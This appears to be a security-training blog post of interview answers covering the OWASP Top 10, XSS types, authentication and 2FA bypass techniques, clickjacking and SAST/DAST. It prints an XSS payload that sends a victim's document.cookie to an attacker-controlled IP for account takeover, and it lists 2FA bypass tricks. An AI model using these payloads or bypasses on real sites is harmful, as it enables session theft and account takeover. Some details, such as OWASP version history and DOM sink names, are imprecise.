OWASP (Open web application security project) Top 10 is a list of vulnerabilities which is used to identify “web application” based attacks.
There are in total 10 most common web app based attacks which are listed and portrayed in owasp top 10.
It was first updated in 2013 and then 2017 and we are still using the 2017 version till now.
There are 4 major changes :
IDOR( insecure direct object references) + MFLAC (missing functional level access control )= BAC(broken access control)
New added are :XXE(XML External Entities) is added in 2017
Insecure Deserialization is added in 2017
Insufficient Logging and monitoring is added in 2017
You can tell any of the 1 or 2 bugs from owasp top 10.
1.XSS
2.Authentication Bypass
Why XSS?
Because the majority of applications use javascript and XSS is a javascript based issue.
In which the Attacker is able to load his arbitrary supplied javascript code into any webapp and the webapp executes it is known as XSS.
There are 3 Types — Reflected, Stored, DOM.
Reflected: if any payload is injected into the web application and if it gets reflected and executed into the web app then it is reflected based xss.
Stored : if any payload is injected into the web application and if it gets executed and stored into the user’s login page ,then it is stored based xss.
Document object model: if any payload is injected into the web application and if gets into the source and comes out of sink then it is a dom based xss.
In this case Vulnerable sink are : document.innerhtml,document.location.,document.domain(),
If alert is blocked, then confirm, prompt, print can be used as a payload.
<script>alert(document.cookie)</script>
1. As we can load and execute our supplied javascript in the web app then we can steal the cookies of the user and perform an Account takeover (ATO).
2.Also We will use a document.cookie payload which will give the cookie and we can redirect the cookie to the attackers server and thus we can take the cookie from our logs.
Final Payload <ScRipt>document.location.href=”http://192.168.0.106:5000/?c=”+document.cookie;</script>
Note: We can also take a screenshot of the victim machine using XSS.
By using Html encoding. We will not use blacklist payloads because that can be bypassed easily as we would not be able to put a strict regex.
Note: Whitelisting input can also be used sometimes, but HTML Encoding or breaking the balancing of JS code should be implemented
Attacker can bypass the username password or authentication/login flow of the website. Because we are able to get full access to any user’s account using this attack.It is considered to be a dangerous and high severity attack
Different Types of Auth Bypass :
1. Login Bypass : in this we generally do username and password bypass
2. Response Manipulation : (false to true) , ( 0 to 1 ):
3. Status Code manipulation: from 403 Forbidden to 200 OK
4. OTP bypass: which will be done by brute forcing
5. Captcha Bypass : which will be done response manipulation
6. Code leakage in JS File: Rare but some JS Files may contain info about the 2FA Code
7. 2FA Code Reuse: Same code can be reused (Same Code works for same device)/ Serial OTP’s
8. No Brute Force Protection : Possible to brute-force any length 2FA Code
9. Missing 2FA Code Integrity Validation: Code for any user account can be used to bypass the 2FA ( I use my OTP to bypass your verification)
10. CSRF on 2FA Disabling: No CSRF Protection on disabling 2FA, also there is no auth confirmation
11. Password Reset Disable 2FA: 2FA gets disabled on password change/email change
12. Bypass 2FA with null or 000000 : Enter “null” in 2FA code -> Enter 000000 in 2FA code -> Send empty code in 2FA code.
Clickjacking happens due to the absence of X-Frame-Option. Enabling this X-Frame-Option or using frame busters will fix the clickjacking issue.
SAST is known as Static Application Security Testing and DAST is known as Dynamic Application Security Testing.
In SAST — we check the source code or do static analysis of the “code”.
In DAST — we check the dynamic requests sent between “client and server”
WhiteBox : In this type of testing we have all the information about the target from the client. We are aware about underlying technology, IP’s and other details like DB(database) version, architecture etc. also a walkthrough is provided to understand how the app works.
Grey Box: Same as above but limited information is provided
Black Box: We do not have much information about target stack like technology etc. only the IP Address or domain name is given by the client. This can be considered as when we perform Bug bounty Hunting.
Note: This is the first part of the article and there will be more upcoming parts with more questions.
🧑🏻🏫 💥Stay Tuned and follow us for more:💥🧑🏻🏫
🧑🏻💻 Cyber Security School : https://learn.hacktify.in
🔗 Udemy: https://www.udemy.com/user/rohit-gautam-38/
🧑🏻🏫 Live Trainings: https://hacktify.in/#live_training-slider
🔐Github: https://github.com/shifa123
📌 Youtube :
https://www.youtube.com/channel/UCS82DNnKOhXHcGKxGzQvNSQ
💬 Linkedin: https://www.linkedin.com/company/hacktifycs